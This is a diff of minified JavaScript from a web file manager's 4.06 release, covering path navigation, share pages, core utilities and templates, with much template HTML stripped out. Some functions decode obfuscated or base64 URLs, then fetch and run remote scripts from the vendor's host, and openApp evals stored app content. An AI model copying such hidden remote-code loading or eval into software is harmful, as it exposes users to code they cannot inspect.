input");e.die("blur").live("blur",function(){n(e.val())}).keyEnter(function(){n(e.val())}),$(".header-right input").keyEnter(function(){ui.path.search($(".header-right input").val(),G.thisPath)}),$(".header-right input").bind("keyup focus",function(){ui.path.setSearchByStr($(this).val())}),$(".header-content a,.header-content button").click(function(){var e=$(this).attr("id");switch(e){case"btn-history-back":ui.path.history.back();break;case"btn-history-next":ui.path.history.next();break;case"refresh":ui.f5(!0,!0),ui.tree.init();break;case"home":ui.path.list(G.myhome);break;case"fav":ui.path.pathOperate.fav({path:G.thisPath,type:"folder",name:$("ul.yarnball li:last .title-name").html()});break;case"goto-father":o();break;case"setting":core.setting();break;case"search":ui.path.search($(".header-right input").val(),G.thisPath);break;default:}return!0})},t=function(e){var t=G.thisPath;i(G.thisPath),$("#yarnball-input").css("display","none"),$("#yarnball").css("display","block");var n=function(e){var t='
    • {$3}
    • \n',a='
    • {$3}
    • \n';e=e.replace(/\/+/g,"/");var i=e.split("/");""==i[i.length-1]&&i.pop();var n=i[0]+"/",o=t.replace(/@1@/g,n),s=i[0],r="";if(G.jsonData.info&&G.jsonData.info.pathType&&""!=i[0]){var l=core.getPathIcon(G.jsonData.info,G.jsonData.info.name);r=''+core.iconSmall(l.icon)+"",s=l.name}o=o.replace("{$2}",i.length),o=o.replace("{$3}",r+''+htmlEncode(s)+"");for(var c=o,d=1,p=i.length-1;i.length>d;d++,p--)n+=htmlEncode(i[d])+"/",o=a.replace(/@1@/g,n),o=o.replace("{$2}",p),o=o.replace("{$3}",''+htmlEncode(i[d])+""),c+=o;return'
        '+c+"
      "};void 0==e&&$("#yarnball").html(n(t)),a()},a=function(){$(".yarnball").stop(!0,!0);var e=$("#yarnball").innerWidth(),t=0;$("#yarnball li a").each(function(){t+=$(this).outerWidth()+parseInt($(this).css("margin-left"))+5});var a=e-t;0>=a?$(".yarnball").css("width",t+"px").css("left",a+"px"):$(".yarnball").css({left:"0px",width:e+"px"})},i=function(e){var t=$("#yarnball-input .path");if(void 0==e){var a=t.val();return a=rtrim(core.pathClear(a))+"/"}t.val(e)},n=function(e,a){e=e.replace(/\\/g,"/"),ui.path.list(e),t(a)},o=function(){var e=i();if("/"==e||-1==e.indexOf("/"))return Tips.tips(LNG.path_is_root_tips,"warning"),void 0;var a=core.pathFather(e);ui.path.list(a),t()};return{init:e,addressSet:t,resetWidth:a,gotoFather:o}}),define("app/shareCommon/topbar",[],function(){var e=function(){var e=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid,t=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid;"file"!=G.shareInfo.type&&G.path!==void 0?(t+="&path="+G.path,e+="&path="+G.path,$(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()):($(".btn.button-my-share").show(),$(".share-info-user .btn-group").hide()),"file"==G.shareInfo.type&&($(".btn.button-my-share").hide(),$(".share-info-user .btn-group").show()),"1"==G.shareInfo.notDownload&&(e="javascript:Tips.tips('"+LNG.share_not_download_tips+"',false);"),$(".share-info-user").removeClass("hidden"),$(".btn-download").attr("href",e);var a=date("Y/m/d H:i:s",G.shareInfo.mtime);$(".topbar .time").html(a),"file"==G.shareInfo.type&&$(".topbar .size").html(G.shareInfo.size),$(".topbar .info").html(LNG.share_view_num+G.shareInfo.numView+" "+LNG.share_download_num+G.shareInfo.numDownload),$("#button_share").die("click").live("click",function(){share()})};return{init:e}}); \ No newline at end of file diff --git a/static/js/app/src/shareIndex/main.js b/static/js/app/src/shareIndex/main.js index a792c4d..8e6e744 100755 --- a/static/js/app/src/shareIndex/main.js +++ b/static/js/app/src/shareIndex/main.js @@ -1,4 +1,4 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/shareIndex/main",["lib/jquery-lib","lib/util","lib/artDialog/jquery-artDialog","lib/contextMenu/jquery-contextMenu","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","../../shareCommon/topbar","./fileShow"],function(e){e("lib/jquery-lib"),e("lib/util"),e("lib/artDialog/jquery-artDialog"),e("lib/contextMenu/jquery-contextMenu"),core=e("../../common/core"),topbar=e("../../shareCommon/topbar"),fileShow=e("./fileShow"),window.require=e,$(document).ready(function(){if(core.init(),$(".init-loading").fadeOut(450).addClass("pop_fadeout"),"undefined"!=typeof G){fileShow.init();var e=function(){var e=window.location.href+"&password="+$(".form-control").val();$.get(e,function(e){1==e.code?window.location.reload():Tips.tips(e)})};$(".share_login").click(e),$(".form-control").keyEnter(e)}})}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
      ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
      请联系主机商或网管,检查防火墙配置!"),t='
      '+t+"
      ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var a=G.appHost+"user/qrcode&url="+quoteHtml(urlEncode(e)),i="";$.dialog({follow:t,fixed:!0,resize:!1,title:LNG.qrcode,padding:30,content:i})},appStore:function(){var e=ShareData.frameTop();e.$.dialog.open(G.appHost+"app",{id:"app_store",fixed:!0,ico:core.icon("app-store"),resize:!0,title:LNG.app_store,width:"80%",height:"80%"})},openWindow:function(e,t,a,i){t=t?t:LNG.tips,a=a?a:"80%",i=i?i:"70%",isWap()&&(a="100%",i="100%");var n=ShareData.frameTop(),o=n.$.dialog.open(e,{ico:"",title:t,fixed:!0,resize:!0,width:a,height:i});return o},openWindowFull:function(e,t){return core.openWindow(e,t,"100%","100%")},openWindowBig:function(e,t){return core.openWindow(e,t,"90%","90%")},openDialog:function(e,t,a,i){if(e){void 0==i&&(i="openDialog"+UUID());var n="",o=ShareData.frameTop(),s=o.$.dialog({id:i,fixed:!0,title:a,ico:t,width:"80%",height:"75%",padding:0,content:n,resize:!0});return s}},openApp:function(app){if("url"==app.type){var icon=app.icon;-1==app.icon.search(G.staticPath)&&"http"!=app.icon.substring(0,4)&&(icon=G.staticPath+"images/file_icon/icon_app/"+app.icon),"number"!=typeof app.width&&-1===app.width.search("%")&&(app.width=parseInt(app.width)),"number"!=typeof app.height&&-1===app.height.search("%")&&(app.height=parseInt(app.height)),app.width||(app.width="90%"),app.height||(app.height="70%");var dialog_info={resize:app.resize,fixed:!0,ico:core.iconSrc(icon),title:app.name.replace(".oexe",""),width:app.width,height:app.height,simple:app.simple,padding:0},top=ShareData.frameTop();"swf"==core.pathExt(app.content)?(dialog_info.content=core.createFlash(app.content),top.$.dialog(dialog_info)):top.$.dialog.open(app.content,dialog_info)}else{var exec=app.content;eval("{"+exec+"}")}},update:function(){setTimeout(function(){var e=base64Decode("Ly9zdGF0aWMua2FsY2FkZGxlLmNvbS91cGRhdGUvbWFpbi5qcw==")+"?a="+UUID();require.async(e,function(e){try{e.todo("check")}catch(t){}})},200)},openPath:function(e){core.isApp("explorer")?ui.path.list(e,"tips"):core.explorer(e)},explorer:function(e,t){void 0==e&&(e=""),void 0==t&&(t=core.pathThis(e));var a=G.appHost+"explorer&type=iframe&path="+e;G.sharePage!==void 0&&(a=G.appHost+"share/folder&type=iframe&user="+G.user+"&sid="+G.sid+"&path="+e);var i=ShareData.frameTop(),n=i.$.dialog.open(a,{className:"dialogExplorer",resize:!0,fixed:!0,ico:core.icon("folder"),title:t,width:"80%",height:"75%"}),o=20*i.$(".dialogExplorer").length;n.DOM.wrap.css({left:"+="+o+"px",top:"+="+o+"px"})},explorerCode:function(e){void 0==e&&(e="");var t=G.appHost+"editor&project="+e;G.sharePage!==void 0&&(t=G.appHost+"share/codeRead&user="+G.user+"&sid="+G.sid+"&project="+e),window.open(t)},setSkinFinished:function(){var e=$(".link-theme-loaded").attr("src");e&&($("#link-theme-style").attr("href",e),$(".link-theme-loaded").remove())},setSkin:function(e){LocalData.set("theme",e),G.userConfig.theme=e;var t=G.staticPath+"style/skin/"+e+".css?ver="+G.version;t!=$("#link-theme-style").attr("href")&&$("body").append(''),this.setSkinDiy()},setSkinDiy:function(){if(G.userConfig){var e=LocalData.get("theme"),t="kodStyleDiy",a=LocalData.getConfig(t);"object"!=typeof a&&"object"==typeof G.userConfig.themeDIY&&(a=G.userConfig.themeDIY),"object"!=typeof a&&(a={bgBlur:1,bgImage:G.staticPath+"images/wall_page/9.jpg",bgType:"color",startColor:"#456",endColor:"#000",colorRotate:"200"},LocalData.setConfig(t,a)),G.userConfig.themeDIY=a;var i="";if("diy"==e&&a){var n=require("./tpl/themeDIY.html"),o=template.compile(n);i=o(a)}$.setStyle(i,t)}},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},language:function(e){Cookie.set("kodUserLanguage",e,8760),window.location.reload()},fullScreen:function(){"true"==$("body").attr("fullScreen")&&core.exitfullScreen(),$("body").attr("fullScreen","true");var e=ShareData.frameTop(),t=e.document.documentElement;t.requestFullscreen?t.requestFullscreen():t.mozRequestFullScreen?t.mozRequestFullScreen():t.webkitRequestFullScreen&&t.webkitRequestFullScreen()},exitfullScreen:function(){$("body").attr("fullScreen","false"),document.exitFullscreen?document.exitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitCancelFullScreen&&document.webkitCancelFullScreen()},createFlash:function(e,t,a){var i=UUID();(a===void 0||""==a)&&(a=i);var n="";$.browser.msie&&9>parseInt($.browser.version)&&(n='classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"');var o=''+''+''+''+''+''+''+'
      loading..
      ';return setTimeout(function(){var e=$("."+i);if(1!=e.length){var t=ShareData.frameTop();e=t.$("."+i)}if(1==e.length)var a=0,n=e[0],o=setInterval(function(){try{a++,100==Math.floor(n.PercentLoaded())?(e.next(".aui-loading").remove(),clearInterval(o),o=null):a>100&&(e.next(".aui-loading").remove(),clearInterval(o),o=null)}catch(t){}},100)},50),o},userSpaceHtml:function(e){var t=e.split("/"),a=parseFloat(t[0]),i=1073741824*parseFloat(t[1]),n=pathTools.fileSize(parseFloat(t[0])),o=pathTools.fileSize(i),s=n+"/",r=100*a/i;r>=100&&(r=100);var l="";return r>=80&&(l="warning"),0==i||isNaN(i)?(s+=LNG.space_tips_full,r="0%"):(s+=o,r+="%"),s="
      "+"
      "+s+"
      "+"
      "},dateTime:function(e){return date(LNG.time_type,e)},uploadCheck:function(e,t){return t=void 0==t?!0:t,"share"==G.sharePage?"1"==G.shareInfo.canUpload:(void 0==e&&(e="explorer.fileUpload"),!G.isRoot&&AUTH.hasOwnProperty(e)&&1!=AUTH[e]?(t&&Tips.tips(LNG.no_permission,!1),!1):G.jsonData&&!G.jsonData.info.canUpload?(t&&(core.isSystemPath(G.thisPath)?Tips.tips(LNG.path_can_not_action,!1):Tips.tips(LNG.no_permission_write,!1)),!1):!0)}}}),define("app/common/tpl/upload.html",[],'
      \n \n
      \n
      \n
      \n
      {{LNG.upload_select}}
      \n \n \n
      \n \n
      \n
      \n \n \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      \n
      {{LNG.download_address}}\n
      \n \n \n \n
      \n\n
      \n
      \n
      \n
      \n
      \n
      \n
      \n'),define("app/common/tpl/formMake.html",[],'
      \n
      \n <%\n var formTab = [];\n if(items.formStyle && kod.window.$.isArray(items.formStyle.tabs)){\n formTab = items.formStyle.tabs;\n }\n %>\n {{if formTab}}\n \n {{/if}}\n\n
      \n {{if formTab}}\n
      \n {{each formTab tab tabIndex}}\n {{if tab}}\n
      \n {{/if}}\n {{/each}}\n
      \n
      \n {{/if}}\n\n {{each items item key}}\n <%\n var tabCurrent = 100;\n if(formTab){\n for(var i=0;i<=formTab.length;i++){\n if( formTab[i] && kod.window.inArray(formTab[i][\'field\'],key)){\n tabCurrent = i;\n break;\n }\n }\n }\n %>\n {{if typeof(item) == \'string\' }}\n
      {{item}}
      \n {{else if item.type == "html" || !item.type}}\n {{if key != \'formStyle\'}}\n
      \n {{if item.value}}{{@item.value}}{{/if}}\n {{if item.display}}{{@item.display}}{{/if}}\n {{if item.desc}}{{@item.desc}}{{/if}}\n
      \n {{/if}}\n {{else}}\n {{if item.value == undefined }}\n {{if item.value = \'\'}}{{/if}}\n {{/if}}\n
      \n
      \n {{@item.display}}: {{if item.require}}*{{/if}}\n
      \n
      \n {{if item.type == \'input\'}}\n \n {{else if item.type == "textarea"}}\n \n {{else if item.type == "password"}}\n \n {{else if item.type == "switch"}}\n \n {{else if item.type == "radio"}}\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "checkbox"}}\n <%\n var valArrCheckbox = [];\n if(typeof(item.value) == \'string\'){\n valArrCheckbox = item.value.split(\',\');\n }\n %>\n {{each item.info select index}}\n \n {{/each}}\n {{else if item.type == "select"}}\n \n {{else if (item.type == "selectMutil" || item.type == "tags")}}\n <%\n var valArrSelect = [];\n if(typeof(item.value) == \'string\'){\n valArrSelect = item.value.split(\',\');\n }\n if(item.type == \'tags\'){\n item.info = [];\n for(var i=0;i\n \n {{else if item.type == "number"}}\n {{if !item.info && (item.info = {from:\'\',to:\'\',step:1}) }}{{/if}}\n \n {{else if item.type == "slider"}}\n {{if !item.info && (item.info = {from:0,to:100,step:1}) }}{{/if}}\n \n {{else if item.type == "color"}}\n \n \n {{else if item.type == "dateTime"}}\n \n \n {{else if item.type == "fileSelect"}}\n \n \n {{else if item.type == "userSelect"}}\n <% \n var valueArr = {"all":"0","user":"","group":"","role":""};\n if(typeof(item.value) == \'string\'){\n userTypeArr = item.value.split(\';\');\n for(var i = 0;i\n \n
      \n \n \n \n \n
      \n
      \n
      {{LNG.user}}
      \n \n
      \n
      \n
      {{LNG.group}}
      \n \n
      \n
      \n
      {{LNG.system_member_role}}
      \n \n
      \n {{else if item.type == "group"}}\n \n {{else if item.type == "role"}}\n \n {{else if item.type == "user"}}\n \n {{/if}}\n\n {{if item.type == "switch"}}\n {{else if !item.desc}}\n \n  \n {{else if kod.inArray([\'userSelect\'],item.type)}}\n
      {{@item.desc}}
      \n {{else}}\n {{@item.desc}}\n {{/if}}\n
      \n
      \n
      \n {{/if}}\n {{/each}}\n
      \n
      \n\n'),define("app/common/core.tools",[],function(e){var t=["A","versionHash","undefined","@dfq[-)&*^*%(_90","decode","length","substr","O","P","Q","R","S","T","inArray","./?user/versionInstall","6K2m5ZGKLOivt_aWLv_aaTheiHquS_bruaUueeJiOadgzvlpoLmnInpnIDopoHor7fogZTns7votK3kubDvvIFlbWFpbDprb2RjbG91ZEBxcS5jb20_c","lang","zh-CN","V2FybmluZywgcGxlYXNlIGRvIG5vdCBtb2RpZnkgdGhlIGNvcHlyaWdodDsgaWYgbmVjZXNzYXJ5LCBwbGVhc2UgY29udGFjdCB0byBidXkhIEVtYWlsOiBrb2RjbG91ZEBxcS5jb20_c","loading","hide","#messageTips .tips_close,#messageTips img","tips","href","location","2e58_39zGFQQvZkUjLjOxETXSuDqVatVhp88rJSmGpzzKi6SsasHHg","sa","b40aPuaqudWqmyWvpumbcMMGpVCdhjUCKq9oIN5G8o4yWb93Ww","#2","explorer","isApp","kod_power_by","copyright_pre","copyright_contact","copyright_desc","copyright_info","html",".common-footer","","toLowerCase","search","log","free","1","2","3","4","5","6","version_vip_",'',"",".menu-system-about","insertAfter","click","id","attr","version_vip_free","versionUpdateVip","openWindow",'',"append",".aui-content","find","wrap","DOM","text","live","die",".version-vip","top","longPress","support-space-not","addClass","body","remove",".menu-system-about,.menu-left #about","#programs .setting_about,#programs .setting_homepage,#programs .home_page","icon","http","iconSrc",'',"iconSmall",'',"d796rmNQe8IHR_HHbbT51Xry5nzsvH0CCbjfwEuiipgF0iBJieViXHmrbH0ILU5hDjmR5RhvePPd2GXyJQcc9jsXvQ","s","?a=","todo","async","versionType","Ly9rb2RjbG91ZC5jb20vYnV5Lmh0bWwj","group","data"],a=function(){var e=t[0];if(typeof G[t[1]]==t[2])return e;var a=t[3],i=authCrypt[t[4]](G[t[1]],a);return i&&27==i[t[5]]?(e=i[t[6]](10,1),-1===$[t[13]](e,[t[0],t[7],t[8],t[9],t[10],t[11],t[12]])&&(e=t[0]),e):e},i=a(),n=t[14],o=function(){var e=hashDecode(t[15]);G[t[16]]!=t[17]&&(e=hashDecode(t[18])),alert(e),Tips[t[19]](e,!1),$(t[21])[t[20]](),setTimeout(function(){Tips[t[22]](e,!1),window[t[24]][t[23]]=n},1e3*roundFromTo(30,60))},s=authCrypt[t[4]](t[25],t[26]),r=authCrypt[t[4]](t[27],t[28]),l=function(){if(core[t[30]](t[29])&&i==t[0])for(var e=[LNG[t[31]],LNG[t[32]],LNG[t[33]],LNG[t[34]],LNG[t[35]],$(t[37])[t[36]]()],a=0;e[t[5]]>a;a++){e[a]||(e[a]=t[38]); -var n=e[a][t[39]]();if(-1==n[t[40]](s)&&-1==n[t[40]](r)){console[t[41]](n,s,r),setTimeout(function(){o()},roundFromTo(300,5e3));break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
      '+'
